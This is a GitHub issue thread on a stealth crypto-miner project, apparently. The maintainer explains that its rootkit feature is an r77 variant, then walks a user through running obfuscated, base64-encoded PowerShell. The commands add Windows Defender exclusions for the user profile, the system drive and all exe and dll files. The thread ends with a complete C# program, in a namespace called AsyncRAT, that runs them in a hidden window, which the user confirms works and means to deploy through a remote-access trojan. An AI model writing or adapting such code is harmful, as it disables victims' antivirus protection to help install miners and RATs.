### ISSUE TITLE
rootkit

### ISSUE THREAD

**Issue by Milk8** [UnamSanctam/SilentCryptoMiner#315]
Whats the Rootkit feature do exactly? Is it a ring 3 rootkit or?

**Comment by Milk8** [comment]
Also, you gave me this yesterday to add an exclusion for exes in wd: 
cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit

How would I use this in a c# executor? (Im using async) and it is obv giving errors

**Comment by Milk8** [comment]
I was trying to do something similar to this but obviously getting errors
### using System.Diagnostics;

Process cmd = new Process();
cmd.StartInfo.FileName = "cmd.exe";
cmd.StartInfo.RedirectStandardInput = true;
cmd.StartInfo.RedirectStandardOutput = true;
cmd.StartInfo.CreateNoWindow = true;
cmd.StartInfo.UseShellExecute = false;
cmd.Start();

cmd.StandardInput.WriteLine("whats pasted above");
cmd.StandardInput.Flush();
cmd.StandardInput.Close();
cmd.WaitForExit();
Console.WriteLine(cmd.StandardOutput.ReadToEnd());

**Comment by UnamSanctam** [comment]
Yes it's a variation of the r77 rootkit: https://github.com/bytecode77/r77-rootkit,  https://github.com/UnamSanctam/SilentCryptoMiner/wiki#install-rootkit

To run the WD code you can just add `cmd.StartInfo.Arguments = "CMDSTRING";` beneath FileName and remove the lower part of that code

**Comment by Milk8** [comment]
What did I do wrong 
![image](https://user-images.githubusercontent.com/77039660/150293558-b295d893-62ca-4acc-a935-76dfccd202f5.png)

**Comment by Milk8** [comment]
I can't tell which ; its referring to, the one at the end is there

**Comment by UnamSanctam** [comment]
You need to escape " with \\"

**Comment by Milk8** [comment]
Don't think I understand what you mean? I tried putting a / at the end of the string still inside the "" aswell as outside them and same thing
![image](https://user-images.githubusercontent.com/77039660/150294680-c0ce0184-efe9-4b56-9a04-f109a501bbb8.png)

**Comment by UnamSanctam** [comment]
No you need to escape the " so it would be:
```
cmd /c powershell -EncodedCommand \"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA\" & powershell -EncodedCommand \"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=\" & exit
```

**Comment by Milk8** [comment]
Still getting errors with that 
![image](https://user-images.githubusercontent.com/77039660/150441402-70a68d55-59b5-42ec-9c19-a8a195c274b1.png)
cmd.StartInfo.Arguments = cmd /c powershell -EncodedCommand \"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA\" & powershell -EncodedCommand \"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=\" & exit

**Comment by UnamSanctam** [comment]
You forgot a " at the beginning and end of the string.

**Comment by Milk8** [comment]
Still same error, thats what I was doing in the beginning 
![image](https://user-images.githubusercontent.com/77039660/150486979-d5030e2d-4d2b-4ec0-bdba-c34f3edc6318.png)

**Comment by UnamSanctam** [comment]
Now just add a ; at the end of the line (14).

**Comment by Milk8** [comment]
Oh I somehow didnt realize that line 15 didn't have one and kept thinking 14 was the issue, its getting no errors now though not actually doing anything, I do have admin rights 
![image](https://user-images.githubusercontent.com/77039660/150487813-32aa011d-9931-44c3-9e84-e55f1bbbd9f0.png)

**Comment by Milk8** [comment]
It works if I use the command via remote powershell but not this

**Comment by UnamSanctam** [comment]
Print any errors inside your catch instead of leaving it empty, or remove the try catch to see any errors that way.

**Comment by Milk8** [comment]
and how would I do that? I know little to nothing about cs as you can tell

**Comment by UnamSanctam** [comment]
Try checking if the process is running as administrator by adding this line above "Process cmd":
`MessageBox.Show("Is Administrator: " + (new WindowsPrincipal(WindowsIdentity.GetCurrent()) ? "Yes" : "No"));`
You might also need to add `using System.Security.Principal;` at the top where the other using are.

**Comment by Milk8** [comment]
Getting expected ; error on that line of code

**Comment by UnamSanctam** [comment]
One parentheses was misplaced.
```
MessageBox.Show("Is Administrator: " + (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? "Yes" : "No"));
```

**Comment by Milk8** [comment]
Now getting the name MessageBox does not exist in the current context

**Comment by UnamSanctam** [comment]
Then you'll have to add `using System.Windows.Forms;`

**Comment by Milk8** [comment]
Executed and I got the msg box saying yes it being ran as admin

**Comment by UnamSanctam** [comment]
You have butchered the top of your code (FileName part) compared to the last screenshot, it should be:
```
using System.Security.Principal;
using System.Windows.Forms;
using System.Diagnostics;
namespace AsyncRAT
{
    public class Program
    {
        public static void Main(string[] args)
        {
            try
            {
                Process cmd = new Process();
                cmd.StartInfo.FileName = "cmd.exe";
                cmd.StartInfo.Arguments = "cmd /c powershell -EncodedCommand \"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA\" & powershell -EncodedCommand \"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=\" & exit";
                cmd.StartInfo.RedirectStandardInput = true;
                cmd.StartInfo.RedirectStandardOutput = true;
                cmd.StartInfo.CreateNoWindow = true;
                cmd.StartInfo.UseShellExecute = false;
                cmd.Start();
            }
            catch { }
        }
    }
} 
```

**Comment by Milk8** [comment]
Yea that worked, though its working on my personal pc and not the localhost one/rdp the rat is hosted on
Not sure if its not working properly or if it can't execute code on 127.0.0.1 pc for whatever reason
